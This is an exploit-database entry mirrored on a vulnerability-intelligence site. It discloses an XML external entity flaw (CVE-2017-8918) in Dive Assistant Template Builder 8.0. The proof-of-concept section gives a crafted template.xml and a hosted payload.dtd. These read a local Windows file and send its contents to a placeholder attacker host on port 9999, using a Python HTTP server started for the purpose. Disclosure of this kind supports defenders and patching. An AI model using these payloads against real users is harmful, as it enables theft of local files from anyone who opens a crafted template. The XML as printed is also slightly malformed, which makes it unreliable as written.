Lucene search
K

Dive Assistant Template Builder 8.0 - XML External Entity Injection

🗓️ 12 May 2017 00:00:00Reported by Trent GordonType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Dive Assistant Desktop XXE Injection via Template Builder 8.

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Blackware Dive Assistant XML External Entity Injection Vulnerability
13 Sep 201700:00
cnvd
CVE
CVE-2017-8918
12 Sep 201718:00
cve
Cvelist
CVE-2017-8918
12 Sep 201718:00
cvelist
EUVD
EUVD-2017-17858
7 Oct 202500:30
euvd
exploitpack
Dive Assistant Template Builder 8.0 - XML External Entity Injection
12 May 201700:00
exploitpack
NVD
CVE-2017-8918
12 Sep 201718:29
nvd
OSV
CVE-2017-8918
12 Sep 201718:29
osv
Prion
Design/Logic Flaw
12 Sep 201718:29
prion
[+] Exploit Title: Dive Assistant - Template Builder XXE Injection
[+] Date: 12-05-2017
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://www.blackwave.com/
[+] Software Link: http://www.diveassistant.com/Products/DiveAssistantDesktop/index.aspx
[+] Version: 8.0
[+] Tested on: Windows 7 SP1, Windows 10
[+] CVE: CVE-2017-8918

1. Vulnerability Description

Dive Assistant - Desktop Edition comes with a template builder .exe to create print templates.  The templates are saved and uploaded as XML files which are vulnerable to XXE injection.  Sending a crafted payload to a user, when opened in Dive Assistant - Template Builder, will return the content of any local files to a remote attacker.

2. Proof of Concept

a.) python -m SimpleHTTPServer 9999 (listening on attacker's IP and hosting payload.dtd)

b.) Hosted "payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>

<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:9999?%file;'>">

%all;

c.) Exploited "template.xml"

<?xml version="1.0"?
<!DOCTYPE exploit [
<!ENTITY % file SYSTEM "C:\Windows\System.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:9999?%file;'>">
%dtd;]>
<exploit>&send;</exploit>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 May 2017 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 24.3
CVSS 35.5
EPSS0.01735
28